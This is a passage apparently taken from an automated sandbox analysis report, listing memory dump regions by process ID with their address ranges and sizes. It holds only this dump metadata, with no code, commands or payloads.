                                                                                                  • memory/2496-272-0x0000000000402F68-mapping.dmp
                                                                                                  • memory/2504-205-0x0000000000560000-0x0000000000561000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2504-200-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2528-257-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2528-260-0x0000000000280000-0x0000000000292000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/2528-259-0x0000000000250000-0x0000000000260000-memory.dmp
                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/2528-221-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2532-204-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                    Filesize

                                                                                                    64KB

                                                                                                  • memory/2532-206-0x0000000000290000-0x00000000002A2000-memory.dmp
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                  • memory/2532-201-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2532-220-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2596-244-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2604-225-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                    Filesize

                                                                                                    8KB

                                                                                                  • memory/2604-223-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2604-226-0x0000000000960000-0x0000000000A61000-memory.dmp
                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                  • memory/2604-229-0x00000000002C0000-0x000000000031C000-memory.dmp
                                                                                                    Filesize

                                                                                                    368KB

                                                                                                  • memory/2628-246-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2664-207-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2680-230-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2700-278-0x0000000000220000-0x0000000000229000-memory.dmp
                                                                                                    Filesize

                                                                                                    36KB

                                                                                                  • memory/2700-279-0x0000000000400000-0x000000000045B000-memory.dmp
                                                                                                    Filesize

                                                                                                    364KB

                                                                                                  • memory/2704-269-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2704-274-0x00000000001B0000-0x00000000001BC000-memory.dmp
                                                                                                    Filesize

                                                                                                    48KB

                                                                                                  • memory/2716-232-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2724-208-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2724-212-0x0000000000200000-0x0000000000201000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/2744-233-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2768-190-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2800-252-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2832-235-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2884-215-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2936-238-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2936-217-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2944-314-0x0000000000400000-0x00000000004A2000-memory.dmp
                                                                                                    Filesize

                                                                                                    648KB

                                                                                                  • memory/2944-313-0x0000000000220000-0x00000000002B1000-memory.dmp
                                                                                                    Filesize

                                                                                                    580KB

                                                                                                  • memory/2964-236-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2976-275-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2980-240-0x0000000000000000-mapping.dmp
                                                                                                  • memory/2988-270-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3004-264-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3012-262-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3036-242-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3036-254-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3056-251-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3064-266-0x0000000000000000-mapping.dmp
                                                                                                  • memory/3068-315-0x00000000000D0000-0x00000000000D7000-memory.dmp
                                                                                                    Filesize

                                                                                                    28KB

                                                                                                  • memory/3756-295-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/3756-296-0x0000000004A22000-0x0000000004A23000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8080-298-0x0000000004A02000-0x0000000004A03000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8080-297-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8096-305-0x0000000004830000-0x0000000004831000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8096-306-0x0000000004832000-0x0000000004833000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8112-304-0x0000000004A92000-0x0000000004A93000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8112-303-0x0000000004A90000-0x0000000004A91000-memory.dmp
                                                                                                    Filesize

                                                                                                    4KB

                                                                                                  • memory/8164-302-0x00000000025F0000-0x000000000323A000-memory.dmp
                                                                                                    Filesize

                                                                                                    12.3MB

                                                                                                  • memory/8164-301-0x00000000025F0000-0x000000000323A000-memory.dmp
                                                                                                    Filesize

                                                                                                    12.3MB